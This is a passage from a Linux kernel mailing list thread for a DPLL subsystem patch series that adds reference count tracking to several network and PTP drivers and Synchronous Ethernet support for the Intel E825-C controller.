return NULL; } #endif struct dpll_device * -dpll_device_get(u64 clock_id, u32 dev_driver_id, struct module *module); +dpll_device_get(u64 clock_id, u32 dev_driver_id, struct module *module, + dpll_tracker *tracker); -void dpll_device_put(struct dpll_device *dpll); +void dpll_device_put(struct dpll_device *dpll, dpll_tracker *tracker); int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, const struct dpll_device_ops *ops, void *priv); @@ -244,7 +253,7 @@ void dpll_device_unregister(struct dpll_device *dpll, struct dpll_pin * dpll_pin_get(u64 clock_id, u32 dev_driver_id, struct module *module, - const struct dpll_pin_properties *prop); + const struct dpll_pin_properties *prop, dpll_tracker *tracker); int dpll_pin_register(struct dpll_device *dpll, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv); @@ -252,7 +261,7 @@ int dpll_pin_register(struct dpll_device *dpll, struct dpll_pin *pin, void dpll_pin_unregister(struct dpll_device *dpll, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv); -void dpll_pin_put(struct dpll_pin *pin); +void dpll_pin_put(struct dpll_pin *pin, dpll_tracker *tracker); void dpll_pin_fwnode_set(struct dpll_pin *pin, struct fwnode_handle *fwnode); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:36 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Update existing DPLL drivers to utilize the DPLL reference count tracking infrastructure. Add dpll_tracker fields to the drivers' internal device and pin structures. Pass pointers to these trackers when calling dpll_device_get/put() and dpll_pin_get/put(). This allows developers to inspect the specific references held by this driver via debugfs when CONFIG_DPLL_REFCNT_TRACKER is enabled, aiding in the debugging of resource leaks. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/zl3073x/dpll.c | 14 ++++++++------ drivers/dpll/zl3073x/dpll.h | 2 ++ drivers/net/ethernet/intel/ice/ice_dpll.c | 15 ++++++++------- drivers/net/ethernet/intel/ice/ice_dpll.h | 4 ++++ drivers/net/ethernet/mellanox/mlx5/core/dpll.c | 15 +++++++++------ drivers/ptp/ptp_ocp.c | 17 ++++++++++------- 6 files changed, 41 insertions(+), 26 deletions(-) diff --git a/drivers/dpll/zl3073x/dpll.c b/drivers/dpll/zl3073x/dpll.c index 8788bcab7ec53..a99d143a7acde 100644 --- a/drivers/dpll/zl3073x/dpll.c +++ b/drivers/dpll/zl3073x/dpll.c @@ -29,6 +29,7 @@ * @list: this DPLL pin list entry * @dpll: DPLL the pin is registered to * @dpll_pin: pointer to registered dpll_pin + * @tracker: tracking object for the acquired reference * @label: package label * @dir: pin direction * @id: pin id @@ -44,6 +45,7 @@ struct zl3073x_dpll_pin { struct list_head list; struct zl3073x_dpll *dpll; struct dpll_pin *dpll_pin; + dpll_tracker tracker; char label[8]; enum dpll_pin_direction dir; u8 id; @@ -1480,7 +1482,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) /* Create or get existing DPLL pin */ pin->dpll_pin = dpll_pin_get(zldpll->dev->clock_id, index, THIS_MODULE, - &props->dpll_props, NULL); + &props->dpll_props, &pin->tracker); if (IS_ERR(pin->dpll_pin)) { rc = PTR_ERR(pin->dpll_pin); goto err_pin_get; @@ -1503,7 +1505,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) return 0; err_register: - dpll_pin_put(pin->dpll_pin, NULL); + dpll_pin_put(pin->dpll_pin, &pin->tracker); err_prio_get: pin->dpll_pin = NULL; err_pin_get: @@ -1534,7 +1536,7 @@ zl3073x_dpll_pin_unregister(struct zl3073x_dpll_pin *pin) /* Unregister the pin */ dpll_pin_unregister(zldpll->dpll_dev, pin->dpll_pin, ops, pin); - dpll_pin_put(pin->dpll_pin, NULL); + dpll_pin_put(pin->dpll_pin, &pin->tracker); pin->dpll_pin = NULL; } @@ -1708,7 +1710,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) dpll_mode_refsel); zldpll->dpll_dev = dpll_device_get(zldev->clock_id, zldpll->id, - THIS_MODULE, NULL); + THIS_MODULE, &zldpll->tracker); if (IS_ERR(zldpll->dpll_dev)) { rc = PTR_ERR(zldpll->dpll_dev); zldpll->dpll_dev = NULL; @@ -1720,7 +1722,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) zl3073x_prop_dpll_type_get(zldev, zldpll->id), &zl3073x_dpll_device_ops, zldpll); if (rc) { - dpll_device_put(zldpll->dpll_dev, NULL); + dpll_device_put(zldpll->dpll_dev, &zldpll->tracker); zldpll->dpll_dev = NULL; } @@ -1743,7 +1745,7 @@ zl3073x_dpll_device_unregister(struct zl3073x_dpll *zldpll) dpll_device_unregister(zldpll->dpll_dev, &zl3073x_dpll_device_ops, zldpll); - dpll_device_put(zldpll->dpll_dev, NULL); + dpll_device_put(zldpll->dpll_dev, &zldpll->tracker); zldpll->dpll_dev = NULL; } diff --git a/drivers/dpll/zl3073x/dpll.h b/drivers/dpll/zl3073x/dpll.h index e8c39b44b356c..c65c798c37927 100644 --- a/drivers/dpll/zl3073x/dpll.h +++ b/drivers/dpll/zl3073x/dpll.h @@ -18,6 +18,7 @@ * @check_count: periodic check counter * @phase_monitor: is phase offset monitor enabled * @dpll_dev: pointer to registered DPLL device + * @tracker: tracking object for the acquired reference * @lock_status: last saved DPLL lock status * @pins: list of pins * @change_work: device change notification work @@ -31,6 +32,7 @@ struct zl3073x_dpll { u8 check_count; bool phase_monitor; struct dpll_device *dpll_dev; + dpll_tracker tracker; enum dpll_lock_status lock_status; struct list_head pins; struct work_struct change_work; diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.c b/drivers/net/ethernet/intel/ice/ice_dpll.c index 64b7b045ecd58..4eca62688d834 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.c +++ b/drivers/net/ethernet/intel/ice/ice_dpll.c @@ -2814,7 +2814,7 @@ static void ice_dpll_release_pins(struct ice_dpll_pin *pins, int count) int i; for (i = 0; i < count; i++) - dpll_pin_put(pins[i].pin, NULL); + dpll_pin_put(pins[i].pin, &pins[i].tracker); } /** @@ -2840,7 +2840,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, for (i = 0; i < count; i++) { pins[i].pin = dpll_pin_get(clock_id, i + start_idx, THIS_MODULE, - &pins[i].prop, NULL); + &pins[i].prop, &pins[i].tracker); if (IS_ERR(pins[i].pin)) { ret = PTR_ERR(pins[i].pin); goto release_pins; @@ -2851,7 +2851,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, release_pins: while (--i >= 0) - dpll_pin_put(pins[i].pin, NULL); + dpll_pin_put(pins[i].pin, &pins[i].tracker); return ret; } @@ -3037,7 +3037,7 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) if (WARN_ON_ONCE(!vsi || !vsi->netdev)) return; dpll_netdev_pin_clear(vsi->netdev); - dpll_pin_put(rclk->pin, NULL); + dpll_pin_put(rclk->pin, &rclk->tracker); } /** @@ -3247,7 +3247,7 @@ ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) { if (cgu) dpll_device_unregister(d->dpll, d->ops, d); - dpll_device_put(d->dpll, NULL); + dpll_device_put(d->dpll, &d->tracker); } /** @@ -3271,7 +3271,8 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, u64 clock_id = pf->dplls.clock_id; int ret; - d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE, NULL); + d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE, + &d->tracker); if (IS_ERR(d->dpll)) { ret = PTR_ERR(d->dpll); dev_err(ice_pf_to_dev(pf), @@ -3287,7 +3288,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, ice_dpll_update_state(pf, d, true); ret = dpll_device_register(d->dpll, type, ops, d); if (ret) { - dpll_device_put(d->dpll, NULL); + dpll_device_put(d->dpll, &d->tracker); return ret; } d->ops = ops; diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.h b/drivers/net/ethernet/intel/ice/ice_dpll.h index c0da03384ce91..63fac6510df6e 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.h +++ b/drivers/net/ethernet/intel/ice/ice_dpll.h @@ -23,6 +23,7 @@ enum ice_dpll_pin_sw { /** ice_dpll_pin - store info about pins * @pin: dpll pin structure * @pf: pointer to pf, which has registered the dpll_pin + * @tracker: reference count tracker * @idx: ice pin private idx * @num_parents: hols number of parent pins * @parent_idx: hold indexes of parent pins @@ -37,6 +38,7 @@ enum ice_dpll_pin_sw { struct ice_dpll_pin { struct dpll_pin *pin; struct ice_pf *pf; + dpll_tracker tracker; u8 idx; u8 num_parents; u8 parent_idx[ICE_DPLL_RCLK_NUM_MAX]; @@ -58,6 +60,7 @@ struct ice_dpll_pin { /** ice_dpll - store info required for DPLL control * @dpll: pointer to dpll dev * @pf: pointer to pf, which has registered the dpll_device + * @tracker: reference count tracker * @dpll_idx: index of dpll on the NIC * @input_idx: currently selected input index * @prev_input_idx: previously selected input index @@ -76,6 +79,7 @@ struct ice_dpll_pin { struct ice_dpll { struct dpll_device *dpll; struct ice_pf *pf; + dpll_tracker tracker; u8 dpll_idx; u8 input_idx; u8 prev_input_idx; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c index 541d83e5d7183..3981dd81d4c17 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c @@ -9,7 +9,9 @@ */ struct mlx5_dpll { struct dpll_device *dpll; + dpll_tracker dpll_tracker; struct dpll_pin *dpll_pin; + dpll_tracker pin_tracker; struct mlx5_core_dev *mdev; struct workqueue_struct *wq; struct delayed_work work; @@ -438,7 +440,8 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, auxiliary_set_drvdata(adev, mdpll); /* Multiple mdev instances might share one DPLL device. */ - mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE, NULL); + mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE, + &mdpll->dpll_tracker); if (IS_ERR(mdpll->dpll)) { err = PTR_ERR(mdpll->dpll); goto err_free_mdpll; @@ -452,7 +455,7 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, /* Multiple mdev instances might share one DPLL pin. */ mdpll->dpll_pin = dpll_pin_get(clock_id, mlx5_get_dev_index(mdev), THIS_MODULE, &mlx5_dpll_pin_properties, - NULL); + &mdpll->pin_tracker); if (IS_ERR(mdpll->dpll_pin)) { err = PTR_ERR(mdpll->dpll_pin); goto err_unregister_dpll_device; @@ -480,11 +483,11 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); err_put_dpll_pin: - dpll_pin_put(mdpll->dpll_pin, NULL); + dpll_pin_put(mdpll->dpll_pin, &mdpll->pin_tracker); err_unregister_dpll_device: dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); err_put_dpll_device: - dpll_device_put(mdpll->dpll, NULL); + dpll_device_put(mdpll->dpll, &mdpll->dpll_tracker); err_free_mdpll: kfree(mdpll); return err; @@ -500,9 +503,9 @@ static void mlx5_dpll_remove(struct auxiliary_device *adev) destroy_workqueue(mdpll->wq); dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); - dpll_pin_put(mdpll->dpll_pin, NULL); + dpll_pin_put(mdpll->dpll_pin, &mdpll->pin_tracker); dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); - dpll_device_put(mdpll->dpll, NULL); + dpll_device_put(mdpll->dpll, &mdpll->dpll_tracker); kfree(mdpll); mlx5_dpll_synce_status_set(mdev, diff --git a/drivers/ptp/ptp_ocp.c b/drivers/ptp/ptp_ocp.c index f39b3966b3e8c..1b16a9c3d7fdc 100644 --- a/drivers/ptp/ptp_ocp.c +++ b/drivers/ptp/ptp_ocp.c @@ -285,6 +285,7 @@ struct ptp_ocp_sma_connector { u8 default_fcn; struct dpll_pin *dpll_pin; struct dpll_pin_properties dpll_prop; + dpll_tracker tracker; }; struct ocp_attr_group { @@ -383,6 +384,7 @@ struct ptp_ocp { struct ptp_ocp_sma_connector sma[OCP_SMA_NUM]; const struct ocp_sma_op *sma_op; struct dpll_device *dpll; + dpll_tracker tracker; int signals_nr; int freq_in_nr; }; @@ -4788,7 +4790,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) devlink_register(devlink); clkid = pci_get_dsn(pdev); - bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE, NULL); + bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE, &bp->tracker); if (IS_ERR(bp->dpll)) { err = PTR_ERR(bp->dpll); dev_err(&pdev->dev, "dpll_device_alloc failed\n"); @@ -4801,7 +4803,8 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) for (i = 0; i < OCP_SMA_NUM; i++) { bp->sma[i].dpll_pin = dpll_pin_get(clkid, i, THIS_MODULE, - &bp->sma[i].dpll_prop, NULL); + &bp->sma[i].dpll_prop, + &bp->sma[i].tracker); if (IS_ERR(bp->sma[i].dpll_pin)) { err = PTR_ERR(bp->sma[i].dpll_pin); goto out_dpll; @@ -4810,7 +4813,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) err = dpll_pin_register(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); if (err) { - dpll_pin_put(bp->sma[i].dpll_pin, NULL); + dpll_pin_put(bp->sma[i].dpll_pin, &bp->sma[i].tracker); goto out_dpll; } } @@ -4820,9 +4823,9 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) out_dpll: while (i--) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin, NULL); + dpll_pin_put(bp->sma[i].dpll_pin, &bp->sma[i].tracker); } - dpll_device_put(bp->dpll, NULL); + dpll_device_put(bp->dpll, &bp->tracker); out: ptp_ocp_detach(bp); out_disable: @@ -4843,11 +4846,11 @@ ptp_ocp_remove(struct pci_dev *pdev) for (i = 0; i < OCP_SMA_NUM; i++) { if (bp->sma[i].dpll_pin) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin, NULL); + dpll_pin_put(bp->sma[i].dpll_pin, &bp->sma[i].tracker); } } dpll_device_unregister(bp->dpll, &dpll_ops, bp); - dpll_device_put(bp->dpll, NULL); + dpll_device_put(bp->dpll, &bp->tracker); devlink_unregister(devlink); ptp_ocp_detach(bp); pci_disable_device(pdev); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:37 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
From: Arkadiusz Kubalewski <arkadiusz.kubalewski@intel.com> Implement SyncE support for the E825-C Ethernet controller using the DPLL subsystem. Unlike E810, the E825-C architecture relies on platform firmware (ACPI) to describe connections between the NIC's recovered clock outputs and external DPLL inputs. Implement the following mechanisms to support this architecture: 1. Discovery Mechanism: The driver parses the 'dpll-pins' and 'dpll-pin names' firmware properties to identify the external DPLL pins (parents) corresponding to its RCLK outputs ("rclk0", "rclk1"). It uses fwnode_dpll_pin_find() to locate these parent pins in the DPLL core. 2. Asynchronous Registration: Since the platform DPLL driver (e.g. zl3073x) may probe independently of the network driver, utilize the DPLL notifier chain The driver listens for DPLL_PIN_CREATED events to detect when the parent MUX pins become available, then registers its own Recovered Clock (RCLK) pins as children of those parents. 3. Hardware Configuration: Implement the specific register access logic for E825-C CGU (Clock Generation Unit) registers (R10, R11). This includes configuring the bypass MUXes and clock dividers required to drive SyncE signals. 4. Split Initialization: Refactor `ice_dpll_init()` to separate the static initialization path of E810 from the dynamic, firmware-driven path required for E825-C. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Co-developed-by: Ivan Vecera <ivecera@redhat.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> Co-developed-by: Grzegorz Nitka <grzegorz.nitka@intel.com> Signed-off-by: Grzegorz Nitka <grzegorz.nitka@intel.com> Signed-off-by: Arkadiusz Kubalewski <arkadiusz.kubalewski@intel.com> --- v3: * DPLL init check in ice_ptp_link_change() * using completion for dpll initization to avoid races with DPLL notifier scheduled works * added parsing of dpll-pin-names and dpll-pins properties v2: * fixed error path in ice_dpll_init_pins_e825() * fixed misleading comment referring 'device tree' --- drivers/net/ethernet/intel/ice/ice_dpll.c | 742 +++++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 26 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 ++++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + 8 files changed, 956 insertions(+), 92 deletions(-) diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.c b/drivers/net/ethernet/intel/ice/ice_dpll.c index 4eca62688d834..a8c99e49bfae6 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.c +++ b/drivers/net/ethernet/intel/ice/ice_dpll.c @@ -5,6 +5,7 @@ #include "ice_lib.h" #include "ice_trace.h" #include <linux/dpll.h> +#include <linux/property.h> #define ICE_CGU_STATE_ACQ_ERR_THRESHOLD 50 #define ICE_DPLL_PIN_IDX_INVALID 0xff @@ -528,6 +529,92 @@ ice_dpll_pin_disable(struct ice_hw *hw, struct ice_dpll_pin *pin, return ret; } +/** + * ice_dpll_pin_store_state - updates the state of pin in SW bookkeeping + * @pin: pointer to a pin + * @parent: parent pin index + * @state: pin state (connected or disconnected) + */ +static void +ice_dpll_pin_store_state(struct ice_dpll_pin *pin, int parent, bool state) +{ + pin->state[parent] = state ? DPLL_PIN_STATE_CONNECTED : + DPLL_PIN_STATE_DISCONNECTED; +} + +/** + * ice_dpll_rclk_update_e825c - updates the state of rclk pin on e825c device + * @pf: private board struct + * @pin: pointer to a pin + * + * Update struct holding pin states info, states are separate for each parent + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - OK + * * negative - error + */ +static int ice_dpll_rclk_update_e825c(struct ice_pf *pf, + struct ice_dpll_pin *pin) +{ + u8 rclk_bits; + int err; + u32 reg; + + if (pf->dplls.rclk.num_parents > ICE_SYNCE_CLK_NUM) + return -EINVAL; + + err = ice_read_cgu_reg(&pf->hw, ICE_CGU_R10, &reg); + if (err) + return err; + + rclk_bits = FIELD_GET(ICE_CGU_R10_SYNCE_S_REF_CLK, reg); + ice_dpll_pin_store_state(pin, ICE_SYNCE_CLK0, rclk_bits == + (pf->ptp.port.port_num + ICE_CGU_BYPASS_MUX_OFFSET_E825C)); + + err = ice_read_cgu_reg(&pf->hw, ICE_CGU_R11, &reg); + if (err) + return err; + + rclk_bits = FIELD_GET(ICE_CGU_R11_SYNCE_S_BYP_CLK, reg); + ice_dpll_pin_store_state(pin, ICE_SYNCE_CLK1, rclk_bits == + (pf->ptp.port.port_num + ICE_CGU_BYPASS_MUX_OFFSET_E825C)); + + return 0; +} + +/** + * ice_dpll_rclk_update - updates the state of rclk pin on a device + * @pf: private board struct + * @pin: pointer to a pin + * @port_num: port number + * + * Update struct holding pin states info, states are separate for each parent + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - OK + * * negative - error + */ +static int ice_dpll_rclk_update(struct ice_pf *pf, struct ice_dpll_pin *pin, + u8 port_num) +{ + int ret; + + for (u8 parent = 0; parent < pf->dplls.rclk.num_parents; parent++) { + ret = ice_aq_get_phy_rec_clk_out(&pf->hw, &parent, &port_num, + &pin->flags[parent], NULL); + if (ret) + return ret; + + ice_dpll_pin_store_state(pin, parent, + ICE_AQC_GET_PHY_REC_CLK_OUT_OUT_EN & + pin->flags[parent]); + } + + return 0; +} + /** * ice_dpll_sw_pins_update - update status of all SW pins * @pf: private board struct @@ -668,22 +755,14 @@ ice_dpll_pin_state_update(struct ice_pf *pf, struct ice_dpll_pin *pin, } break; case ICE_DPLL_PIN_TYPE_RCLK_INPUT: - for (parent = 0; parent < pf->dplls.rclk.num_parents; - parent++) { - u8 p = parent; - - ret = ice_aq_get_phy_rec_clk_out(&pf->hw, &p, - &port_num, - &pin->flags[parent], - NULL); + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) { + ret = ice_dpll_rclk_update_e825c(pf, pin); + if (ret) + goto err; + } else { + ret = ice_dpll_rclk_update(pf, pin, port_num); if (ret) goto err; - if (ICE_AQC_GET_PHY_REC_CLK_OUT_OUT_EN & - pin->flags[parent]) - pin->state[parent] = DPLL_PIN_STATE_CONNECTED; - else - pin->state[parent] = - DPLL_PIN_STATE_DISCONNECTED; } break; case ICE_DPLL_PIN_TYPE_SOFTWARE: @@ -1842,6 +1921,40 @@ ice_dpll_phase_offset_get(const struct dpll_pin *pin, void *pin_priv, return 0; } +/** + * ice_dpll_synce_update_e825c - setting PHY recovered clock pins on e825c + * @hw: Pointer to the HW struct + * @ena: true if enable, false in disable + * @port_num: port number + * @output: output pin, we have two in E825C + * + * DPLL subsystem callback. Set proper signals to recover clock from port. + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - success + * * negative - error + */ +static int ice_dpll_synce_update_e825c(struct ice_hw *hw, bool ena, + u32 port_num, enum ice_synce_clk output) +{ + int err; + + /* configure the mux to deliver proper signal to DPLL from the MUX */ + err = ice_tspll_cfg_bypass_mux_e825c(hw, ena, port_num, output); + if (err) + return err; + + err = ice_tspll_cfg_synce_ethdiv_e825c(hw, output); + if (err) + return err; + + dev_dbg(ice_hw_to_dev(hw), "CLK_SYNCE%u recovered clock: pin %s\n", + output, str_enabled_disabled(ena)); + + return 0; +} + /** * ice_dpll_output_esync_set - callback for setting embedded sync * @pin: pointer to a pin @@ -2263,6 +2376,28 @@ ice_dpll_sw_input_ref_sync_get(const struct dpll_pin *pin, void *pin_priv, state, extack); } +static int +ice_dpll_pin_get_parent_num(struct ice_dpll_pin *pin, + const struct dpll_pin *parent) +{ + int i; + + for (i = 0; i < pin->num_parents; i++) + if (pin->pf->dplls.inputs[pin->parent_idx[i]].pin == parent) + return i; + + return -ENOENT; +} + +static int +ice_dpll_pin_get_parent_idx(struct ice_dpll_pin *pin, + const struct dpll_pin *parent) +{ + int num = ice_dpll_pin_get_parent_num(pin, parent); + + return num < 0 ? num : pin->parent_idx[num]; +} + /** * ice_dpll_rclk_state_on_pin_set - set a state on rclk pin * @pin: pointer to a pin @@ -2286,35 +2421,44 @@ ice_dpll_rclk_state_on_pin_set(const struct 